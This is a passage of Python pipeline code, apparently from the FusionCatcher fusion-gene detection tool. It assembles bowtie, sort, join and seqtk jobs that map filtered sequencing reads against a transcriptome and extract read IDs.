'--no-seqtk-subseq' !")) job.clean(outdir('reads-filtered.fq'),temp_path=temp_flag) job.clean(outdir('list-names-reads-filtered_genome.txt'),temp_path=temp_flag) #IDEA # cat list-names-reads-filtered_genome.txt | gnu_parallel --part -k -j1 --block 10G seqtk subseq reads-filtered.fq - > reads_filtered_unique-mapped-genome.fq # sed 's/^/^@/g' ids.txt > aha.txt ; cat /apps/reads_filtered_not-mapped-genome_not-mapped-transcriptome_psl-pp.fq | paste - - - - | /apps/tools/parallel-20140822/src/parallel --pipe --no-notice grep -f aha.txt - | tr "\t" "\n" > result.fq ############################################################################## # MAPPING short reads which do not map on genome against the transcriptome ############################################################################## if job.iff(empty(outdir('reads_filtered_not-mapped-genome.fq')),id = "#reads_filtered_not-mapped-genome.fq#"): # job.add('echo',kind='program') # job.add('-n','""',kind='parameter') # job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome.map'),kind='output') # job.run() job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome.map'),kind='output') job.run() job.add('printf',kind='program') job.add('"\nMapping on transcriptome the filtered reads which did not map on genome:\n------------------------------------------------------------------------\nNo reads and no alignments!\n\n\n"', kind='parameter') job.add('>>',log_file,kind='output') job.run() else: # map using the transcript index (not mapped, unique alignment, multiple alignments) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') #job.add('--solexa1.3-quals',kind='parameter') job.add('--phred33-quals',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--un',outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq'),kind='output') # <== reads which do not map on transcriptome and genome! ####### job.add('--max',outdir('reads_filtered_genome-transcriptome_multiple.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome.fq'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome.map'),kind='output') job.add('2>',outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome.stdout.txt'),kind='parameter',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome.stdout.txt'), tofile = info_file, top = ["Mapping on transcriptome the filtered reads which did not map on genome:", "------------------------------------------------------------------------"], bottom = "\n\n\n") # # trim it more and get more pairs for candidate fusion genes # if (not is_optparse_provided(parser,'trim_3end_keep2')) and options.trim_3end_keep2 > 0 and options.trim_3end_keep2 < 25 and len_reads == 60: options.trim_3end_keep2 = 25 anchorx = options.trim_3end_keep2 avgx = int((len_reads - anchorx - options.trim_3end_keep2)/2) if options.trim_3end_keep2 > 0 and avgx > 0: # trim2 fqi = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome.fq') if job.iff(not empty(fqi),id = "#reads_filtered_not-mapped-genome_not-mapped-transcriptome-trim2.fq#"): trim2_bowtie_k = '100' # '500' trim2_bowtie_try_hard = False fqo = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_trim2_3end.fq') fmapo = outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map') job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k',trim2_bowtie_k,kind='parameter') job.add('-v','0',kind='parameter') job.add('--trim3',len_reads-options.trim_3end_keep2,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--phred33-quals',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if trim2_bowtie_try_hard: job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--un',fqo,kind='output',temp_path=temp_flag) # <== reads which do not map on transcriptome and genome! ####### job.add('--max',outdir('reads_filtered_genome-transcriptome_multiple_trim2_3end.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',fqi,kind='input') job.add('',fmapo,kind='output') # trim2 job.add('2>',outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome_trim2_3end.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',fmapo,kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('";"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f','1,4',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',kind='parameter') job.add("""'{print $1"\\t"$2"\\t1"}'""",kind='parameter') job.add('>',fmapo+".1",kind='output') job.run() fqo = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_trim2_5end.fq') fmapo = outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_5end.map') job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k',trim2_bowtie_k,kind='parameter') job.add('-v','0',kind='parameter') job.add('--trim5',len_reads-anchorx,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--phred33-quals',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if trim2_bowtie_try_hard: job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--un',fqo,kind='output',temp_path=temp_flag) # <== reads which do not map on transcriptome and genome! ####### job.add('--max',outdir('reads_filtered_genome-transcriptome_multiple_trim2_5end.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',fqi,kind='input') job.add('',fmapo,kind='output') # trim2 job.add('2>',outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome_trim2_5end.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',fmapo,kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('";"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f','1,4',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',kind='parameter') job.add("""'{print $1"\\t"$2"\\t2"}'""",kind='parameter') job.add('>',fmapo+".2",kind='output') job.run() fqo = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_trim2_3end-half.fq') fmapo = outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end-half.map') job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k',trim2_bowtie_k,kind='parameter') job.add('-v','0',kind='parameter') job.add('--trim3',len_reads-options.trim_3end_keep2-avgx,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--phred33-quals',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if trim2_bowtie_try_hard: job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--un',fqo,kind='output',temp_path=temp_flag) # <== reads which do not map on transcriptome and genome! ####### job.add('--max',outdir('reads_filtered_genome-transcriptome_multiple_trim2_3end-half.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',fqi,kind='input') job.add('',fmapo,kind='output') # trim2 job.add('2>',outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome_trim2_3end-half.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',fmapo,kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('";"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f','1,4',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',kind='parameter') job.add("""'{print $1"\\t"$2"\\t3"}'""",kind='parameter') job.add('>',fmapo+".3",kind='output') job.run() fqo = outdir('reads_filtered_not-mapped-genome_not-mapped-transcriptome_trim2_5end-half.fq') fmapo = outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_5end-half.map') job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k',trim2_bowtie_k,kind='parameter') job.add('-v','0',kind='parameter') job.add('--trim5',len_reads-anchorx-avgx,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--phred33-quals',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if trim2_bowtie_try_hard: job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--un',fqo,kind='output',temp_path=temp_flag) # <== reads which do not map on transcriptome and genome! ####### job.add('--max',outdir('reads_filtered_genome-transcriptome_multiple_trim2_5end-half.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',fqi,kind='input') job.add('',fmapo,kind='output') # trim2 job.add('2>',outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome_trim2_5end-half.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',fmapo,kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('";"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f','1,4',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',kind='parameter') job.add("""'{print $1"\\t"$2"\\t4"}'""",kind='parameter') job.add('>',fmapo+".4",kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.1'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_5end-half.map.4'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add('filter_map_pre-splitting.py',kind='parameter') job.add('-i','-',kind='parameter') job.add('-o',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.1'),kind='output') job.add('-x',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.ex.1'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.sorted.map'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('join',kind='parameter') job.add('-1','1',kind='parameter') job.add('-2','1',kind='parameter') job.add('-t',"'\t'",kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.1'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.sorted.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.join.1.map'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end-half.map.3'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_5end.map.2'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') job.add(_FC_+'filter_map_pre-splitting.py',kind='parameter') job.add('-i','-',kind='parameter') job.add('-o',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.2'),kind='output') job.add('-x',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.ex.2'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end-half.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end-half.sorted.map'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('join',kind='parameter') job.add('-1','1',kind='parameter') job.add('-2','1',kind='parameter') job.add('-t',"'\t'",kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.2'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end-half.sorted.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.join.2.map'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.ex.1'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.ex.2'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex'),kind='output') job.run() job.add(_FC_+'filter_pairs.py',kind='program') job.add('-i',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex'),kind='input') job.add('-g',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.good'),kind='output') job.add('-b',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.bad'),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.join.1.map'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.join.2.map'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all-temp.map'),kind='output') job.run() if job.iff(not empty(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.bad')), id = "#reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.bad#"): job.add('LC_ALL=C',kind='program') job.add('join',kind='parameter') job.add('-1','1',kind='parameter') job.add('-2','1',kind='parameter') job.add('-v','2',kind='parameter') job.add('-t',"'\t'",kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.bad'),kind='input',temp_path=temp_flag) job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all-temp.map'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map'),kind='output') job.run() else: job.link(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all-temp.map'), outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map'), temp_path=temp_flag) job.clean(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.bad'),temp_path=temp_flag) #job.clean(outdir('reads_filtered_not-mapped-genome_transcriptome_trim2_3end.map.all.ex.good'),temp_path=temp_flag) job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("""'{n=length($1); r=substr($1,1,n-2); print r}'""",kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome_trim2.join.all.map'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_not-mapped_trim2_ids.txt'),kind='output') job.run() # job.add('printf',kind='program') # job.add(('"\n\nMapping on transcriptome the filtered reads which did not map on genome:\n'+ # '------------------------------------------------------------------------\n"'),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('log_bowtie_reads_not-mapped-genome_but_mapped-transcriptome.stdout.txt'),kind='input') # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # extract ids of short reads which mapped on the transcriptome job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f','1',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome_transcriptome.map'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') # job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('list-names-reads-filtered_not-mapped-genome_mapped-transcriptome.txt'),kind='output') job.run() if not options.split_seqtk_subseq: #extract the short reads which mapped on the transcriptome and do not map on genome job.add(_FC_+'extract_short_reads.py',kind='program') job.add('--input',outdir('reads_filtered_not-mapped-genome.fq'),kind='input') job.add('--list',outdir('list-names-reads-filtered_not-mapped-genome_mapped-transcriptome.txt'),kind='input') job.add('--output',outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq'),kind='output') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.run(error_message = ("If this fails (again?) due to a memory error (e.g. not enough free memory) then lowering the "+ "buffer size for specifically this script might help. This can be done by using the FusionCatcher's "+ "command line option '--extra-buffer-size "+str(int(options.extract_buffer_size)/2)+"' .")) elif options.split_seqtk_subseq == 1: #extract the short reads which mapped on the transcriptome and do not map on genome job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome.fq'),kind='input') job.add('',outdir('list-names-reads-filtered_not-mapped-genome_mapped-transcriptome.txt'),kind='input') job.add('>',outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) elif options.split_seqtk_subseq > 1: #extract the short reads which mapped on the transcriptome and do not map on genome job.add(_FC_+'seqtk-subseq.sh',kind='program') job.add('',_SK_ if _SK_ else '-',kind='parameter') job.add('',_PL_ if _PL_ else '-',kind='parameter') job.add('',options.split_seqtk_subseq,kind='parameter') job.add('',outdir('reads_filtered_not-mapped-genome.fq'),kind='input') job.add('',outdir('list-names-reads-filtered_not-mapped-genome_mapped-transcriptome.txt'),kind='input') job.add('',outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq'),kind='output') job.run(error_message=("ERROR: Most likely this fails because there is not enough free RAM memory for running SEQTK SUBSEQ tool <https://github.com/lh3/seqtk> on this computer. "+ "Please, try to (i) run it on a server/computer with larger amount of memory, or (ii) using command line option '--no-seqtk-subseq' !")) job.clean(outdir('reads_filtered_not-mapped-genome.fq'),temp_path=temp_flag) job.clean(outdir('list-names-reads-filtered_not-mapped-genome_mapped-transcriptome.txt'),temp_path=temp_flag) else: job.link(outdir('reads-filtered.fq'),outdir('reads_filtered_unique-mapped-genome.fq'),temp_path=temp_flag) job.add('touch',kind='program') job.add('',outdir('reads_filtered_not-mapped-genome_mapped-transcriptome.fq'),kind='output') job.run() ############################################################################## # MAPPING short reads (which map uniquely on genome) against the transcriptome ############################################################################## # map using the transcript index (not mapped, unique alignment, multiple alignments) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') #job.add('--solexa1.3-quals',kind='parameter') job.add('--phred33-quals',kind='parameter') job.add('--best',kind='parameter') job.add('--tryhard',kind='parameter') job.add('--strata',kind='parameter') job.add('--suppress','5,6,7',kind='parameter') if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('',outdir('reads_filtered_unique-mapped-genome.fq'),kind='input') job.add('',outdir('reads_filtered_unique-mapped-genome_transcriptome_temp.map'),kind='output') job.add('2>',outdir('log_bowtie_reads_unique-mapped-genome_mapped-transcriptome.stdout.txt'),kind='parameter',checksum='no') #job.add('2>&1',kind='parameter',checksum='no') job.run() info(job, fromfile = outdir('log_bowtie_reads_unique-mapped-genome_mapped-transcriptome.stdout.txt'), tofile = info_file, top = ["Mapping on transcriptome the filtered reads which map uniquely on genome:", "------------------------------------------------------------------------"], bottom = "\n\n\n") if job.iff((not options.skip_genome_transcriptome_filtering) and (not empty(outdir('reads_filtered_genome.map'))),id="#genome_transcriptome_filtering#"): # filter the mapped reads on transcriptome wich mapped also on genome using mismatches job.add(_FC_+'remove_reads_genome_transcriptome.py',kind='program') job.add('--input_map_1',outdir('reads_filtered_genome.map'),kind='input',temp_path=temp_flag) job.add('--input_map_2',outdir('reads_filtered_unique-mapped-genome_transcriptome_temp.map'),kind='input',temp_path=temp_flag) job.add('--mismatches_column','5',kind='parameter') job.add('--output',outdir('reads_filtered_unique-mapped-genome_transcriptome.map'),kind='output') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') job.run() else: job.link(outdir('reads_filtered_unique-mapped-genome_transcriptome_temp.map'),outdir('reads_filtered_unique-mapped-genome_transcriptome.map'),temp_path=temp_flag) job.clean(outdir('reads_filtered_genome.map'),temp_path=temp_flag) # extract the names of the short reads which mapped on the transcriptome job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f','1',kind='parameter') job.add('',outdir('reads_filtered_unique-mapped-genome_transcriptome.map'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('list-names-reads-filtered_unique-mapped-genome_mapped-transcriptome.txt'),kind='output') job.run() # job.add('printf',kind='program') # job.add('"Count reads left mapping transcriptome and genome (before filtering out those with better mappings on genome):\n---------------------------------------------------\n "',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('cat',kind='program') # job.add('',outdir('reads_filtered_unique-mapped-genome.fq'),kind='input') # job.add('|',kind='parameter') # job.add("echo $((`wc -l`/4))",kind='parameter') # job.add('>>',info_file,kind='output') # job.run() if not 